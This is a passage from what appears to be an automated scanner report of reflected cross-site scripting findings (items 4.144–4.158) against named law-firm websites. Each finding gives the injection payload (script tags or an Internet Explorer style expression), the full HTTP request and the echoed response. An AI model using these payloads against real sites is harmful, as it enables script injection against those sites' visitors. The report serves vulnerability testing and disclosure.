This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpgd22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpgd22b2"style="x:expression(alert(1))"06ea3ed31de">
...[SNIP]...

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bda6"><script>alert(1)</script>8ad033eb3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index-print">
...[SNIP]...

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b5c"><script>alert(1)</script>c3ef65ee739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739-print">
...[SNIP]...

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feddf"><script>alert(1)</script>141aece0633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/index?feddf"><script>alert(1)</script>141aece0633=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/index?feddf"><script>alert(1)</script>141aece0633=1&amp;printable=yes">
...[SNIP]...

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd51"><script>alert(1)</script>5aa86bd4b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74-print">
...[SNIP]...

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ee3"><script>alert(1)</script>d9e5dbdc1f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england-print">
...[SNIP]...

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 816d8"><script>alert(1)</script>9a9e300e5c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5-print">
...[SNIP]...

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b011"><script>alert(1)</script>c99e597bca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1&amp;printable=yes">
...[SNIP]...

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee970"><script>alert(1)</script>a8722f44815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsee970"><script>alert(1)</script>a8722f44815/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsee970"><script>alert(1)</script>a8722f44815/index-print">
...[SNIP]...

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c57c0"><script>alert(1)</script>082bddadd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/indexc57c0"><script>alert(1)</script>082bddadd32 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/indexc57c0"><script>alert(1)</script>082bddadd32-print">
...[SNIP]...

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00f"><script>alert(1)</script>81755691be4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/index?de00f"><script>alert(1)</script>81755691be4=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/index?de00f"><script>alert(1)</script>81755691be4=1&amp;printable=yes">
...[SNIP]...

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf7c"><script>alert(1)</script>b8520e48e4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology-print">
...[SNIP]...

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae3f"><script>alert(1)</script>535c552892a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a-print">
...[SNIP]...

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406d7"><script>alert(1)</script>6b5c14438ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1&amp;printable=yes">
...[SNIP]...

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3ab"><script>alert(1)</script>633a1638eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index-print">
...[SNIP]...

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66193"><script>alert(1)</script>5ba64a12336 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index66193"><script>alert(1)</script>5ba64a12336 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
